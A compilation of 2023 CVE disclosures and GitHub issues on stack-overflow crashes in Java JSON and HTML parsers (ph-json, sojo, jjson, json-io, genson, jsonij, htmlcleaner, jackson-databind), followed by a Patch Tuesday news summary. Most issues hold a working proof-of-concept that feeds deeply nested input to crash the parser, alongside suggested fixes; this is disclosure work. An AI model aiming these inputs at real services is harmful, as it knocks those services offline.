An issue was discovered ph-json thru 9.5.5 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by ph-json parsing of untrusted JSON String****Description**

Using ph-json to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.ArrayList.get(ArrayList.java:459)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:201)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:186)
    	at com.helger.commons.collection.NonBlockingStack.peek(NonBlockingStack.java:112)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addToStackPeek(CollectingJsonParserHandler.java:51)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addSimple(CollectingJsonParserHandler.java:71)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addCollection(CollectingJsonParserHandler.java:76)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler.onArrayStart(CollectingJsonParserHandler.java:115)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:804)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    
    

**PoC**

        <dependency\>
            <groupId\>com.helger</groupId\>
            <artifactId\>ph-json</artifactId\>
            <version\>9.5.5</version\>
        </dependency\>

import com.helger.json.serialize.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.readFromString(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34612: Stack overflow error caused by ph-json parsing of untrusted JSON String · Issue #35 · phax/ph-commons

An issue was discovered sojo thru 1.1.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by sojo parsing of untrusted JSON String****Description**

Using sojo to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_scan_token(JsonParserGenerate.java:503)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_4(JsonParserGenerate.java:344)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_3(JsonParserGenerate.java:374)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:351)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_6(JsonParserGenerate.java:313)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_6(JsonParserGenerate.java:258)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3R_3(JsonParserGenerate.java:357)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_3_13(JsonParserGenerate.java:295)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.jj_2_13(JsonParserGenerate.java:252)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:144)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.value(JsonParserGenerate.java:78)
    	at net.sf.sojo.interchange.json.generate.JsonParserGenerate.array(JsonParserGenerate.java:145)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.sojo</groupId\>
            <artifactId\>sojo</artifactId\>
            <version\>1.1.1</version\>
        </dependency\>

import net.sf.sojo.interchange.json.JsonParser;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonParser parser = new JsonParser();
        parser.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34613: Stack overflow error caused by sojo parsing of untrusted JSON String · Issue #15 · maddingo/sojo

An issue was discovered jjson thru 0.1.7 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**Stack overflow error caused by jjson serialization Map****Description**

jjson before v0.1.7 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.AggregateTranslator.translate(AggregateTranslator.java:52)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:87)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.text.translate.CharSequenceTranslator.translate(CharSequenceTranslator.java:61)
    	at de.grobmeier.jjson.shaded.org.apache.commons.lang3.StringEscapeUtils.escapeJava(StringEscapeUtils.java:456)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeString(JSONAnnotationEncoder.java:286)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:149)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encode(JSONAnnotationEncoder.java:101)
    	at de.grobmeier.jjson.convert.JSONAnnotationEncoder.encodeMap(JSONAnnotationEncoder.java:151)
    
    

**PoC**

        <dependency\>
            <groupId\>de.grobmeier.json</groupId\>
            <artifactId\>jjson</artifactId\>
            <version\>0.1.7</version\>
        </dependency\>

import de.grobmeier.jjson.JSONException;
import de.grobmeier.jjson.convert.JSONAnnotationEncoder;

import java.util.HashMap;

public class PoC2 {

    public static void main(String\[\] args) throws JSONException {
        HashMap<String,Object\> map\=new HashMap<>();
        map.put("t",map);
        JSONAnnotationEncoder jsonAnnotationEncoder = new JSONAnnotationEncoder();
        jsonAnnotationEncoder.encode(map);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
2.  https://github.com/jettison-json/jettison/pull/53/files

1 participant

CVE-2023-35110: Stack overflow error caused by jjson serialization Map · Issue #2 · grobmeier/jjson

An issue was discovered json-io thru 4.14.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by json-io parsing of untrusted JSON String****Description**

Using json-io to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:241)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    	at com.cedarsoftware.util.io.JsonParser.readArray(JsonParser.java:288)
    	at com.cedarsoftware.util.io.JsonParser.readValue(JsonParser.java:256)
    
    

**PoC**

<dependency\>
	<groupId\>com.cedarsoftware</groupId\>
	<artifactId\>json-io</artifactId\>
	<version\>4.14.0</version\>
</dependency\>

import com.cedarsoftware.util.io.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.jsonToJava(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34610: Stack overflow error caused by json-io parsing of untrusted JSON String · Issue #169 · jdereg/json-io

An issue was discovered genson thru 1.6 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by genson parsing of untrusted JSON String****Description**

Using genson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at com.owlike.genson.stream.JsonReader.begin(JsonReader.java:409)
    	at com.owlike.genson.stream.JsonReader.beginArray(JsonReader.java:149)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:172)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.deserialize(DefaultConverters.java:997)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:176)
    	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
    	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
    	at com.owlike.genson.Genson.deserialize(Genson.java:382)
    
    

**PoC**

        <dependency\>
            <groupId\>com.owlike</groupId\>
            <artifactId\>genson</artifactId\>
            <version\>1.6</version\>
        </dependency\>

import com.owlike.genson.Genson;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        // 创建 Genson 实例
        Genson genson = new Genson();

        // 模糊测试 JSON 解析
        Object parsedObject = genson.deserialize(jsonString, Object.class);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34617: Stack overflow error caused by genson parsing of untrusted JSON String · Issue #191 · owlike/genson

An issue was discovered jmarsden/jsonij thru 0.5.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

Using jsonij to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Exception in thread "main" java.lang.StackOverflowError
    at jsonij.ArrayImp.internalType(ArrayImp.java:53)
    at jsonij.Value.<init>(Value.java:54)
    at jsonij.ArrayImp.<init>(ArrayImp.java:44)
    at jsonij.JSON$Array.<init>(JSON.java:326)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:271)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)

        <dependency>
            <groupId>cc.plural</groupId>
            <artifactId>jsonij</artifactId>
            <version>0.5.2</version>
        </dependency>

import jsonij.Value;
import jsonij.parser.JSONParser;
import jsonij.parser.ParserException;

public class PoC {

    public final static int TOO\_DEEP\_NESTING \= 9999;
    public final static String TOO\_DEEP\_DOC \= \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");

    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb \= new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i \= 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i \= 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) throws ParserException {
        String jsonString \= TOO\_DEEP\_DOC;
        JSONParser jsonParser \= new JSONParser();
        Value parse \= jsonParser.parse(jsonString);
    }
}

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b))
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）))

‌

CVE-2023-34614: Stack overflow error caused by jsonij parsing of untrusted JSON String

An issue was discovered jackson-databind thru 2.15.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

This happens with any recursive data structure. Jackson will not detect loops in data structures. For example:

    public static void main(String\[\] args) throws JsonProcessingException {
        A a = new A();
        A b = new A();
        a.next = b;
        b.next = a;
        new ObjectMapper().writeValueAsString(a); // will fail
    }

    static class A {
        A next;

        public A getNext() {
            return next;
        }
    }

imo this is not really an issue. For example, calling hashCode on the same map would also cause a stack overflow, but this is not considered a security issue. You can't construct such a data structure using jackson deserialization. Others may disagree on this though.

BeanSerializer has some error handling to make the error a bit nicer, but it's still a stack overflow with all the issues associated with that.

> This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Your test case does not demonstrate this, can you please show how this can be exploited via a crafted string?

CVE-2023-35116: Stack overflow error caused by serialization of Map or List with self references · Issue #3972 · FasterXML/jackson-databind

An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by htmlcleaner parsing of untrusted HTML String****Description**

Using htmlcleaner to parse untrusted HTML String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
    	at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
    	at java.base/java.util.HashSet.iterator(HashSet.java:173)
    	at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    
    
    

**PoC**

        <dependency\>
            <groupId\>net.sourceforge.htmlcleaner</groupId\>
            <artifactId\>htmlcleaner</artifactId\>
            <version\>2.28</version\>
        </dependency\>

import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try {

            // 模糊测试组件的风险接口
            HtmlCleaner cleaner = new HtmlCleaner();
            TagNode root = cleaner.clean(htmlData);

            // 对解析结果进行进一步操作
            // ...

        } catch (Exception e) {
            // 处理异常
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34624: Stack overflow error caused by htmlcleaner parsing of untrusted HTML String · Issue #13 · amplafi/htmlcleaner

The June 2023 Patch Tuesday security update included fixes for a bypass for two previously addressed issues in Microsoft Exchange and a critical elevation of privilege flaw in SharePoint Server.

Microsoft’s Patch Tuesday security update for June 2023 contains patches for 69 vulnerabilities across its suite of products and software. Some of the fixed flaws were originally submitted to the Zero Day Institute during the Pwn2Own competition earlier this year in Vancouver.

Microsoft identified a total six of the bugs it fixed this month as being of critical severity and 62 as important. Just one is rated moderate in severity. For the first time in months, Microsoft did not disclose any zero-days, vulnerabilities that are already under active attack.

**Prioritizing Patches for Critical Bugs**

The security updates address issues in Microsoft Windows and Windows Components, Office and Office Components, Exchange Server, Microsoft Edge (Chromium), SharePoint Server, .NET and Visual Studio, Microsoft Teams, Azure DevOps, Microsoft Dynamics, and the Remote Desktop Client.

The critical elevation of privilege vulnerability in Microsoft SharePoint Server (CVE-2023-29357) was one of the bugs chained together in a successful exploit during the Pwn2Own competition, Dustin Childs, researcher with Trend Micro's Zero Day Initiative (ZDI), wrote in a blog post. Attackers have a chance at gaining administrator privileges on the SharePoint Server if they have spoofed JSON Web Token (JWT) authentication tokens — all without requiring any user interaction. Both SharePoint Enterprise Server 2016 and SharePoint Server 2019 are vulnerable.

Microsoft recommended that on-premises customers enable the AMSI feature. Childs said ZDI's team had not yet tested the workaround but said that the "best bet is to test and deploy the update as soon as possible."

The three remote code execution vulnerabilities in the Windows Pragmatic General Multicast (PGM) server environment (CVE-2023-20363, CVE-2023-32014, CVE-2023-32015) all have the same base severity score of 9.8 — and this is the third month that Microsoft is addressing critical severity flaws in PGM. A remote, unauthenticated attacker could send a specially crafted file over the network and execute malicious code in a Windows PGM server environment where the Windows message queuing service is running. Even though PGM is not enabled by default, many organizations have PGM in their environment since it is a protocol used for reliable multicast data delivery in Windows. PGM is commonly used in applications like video streaming and online gaming.

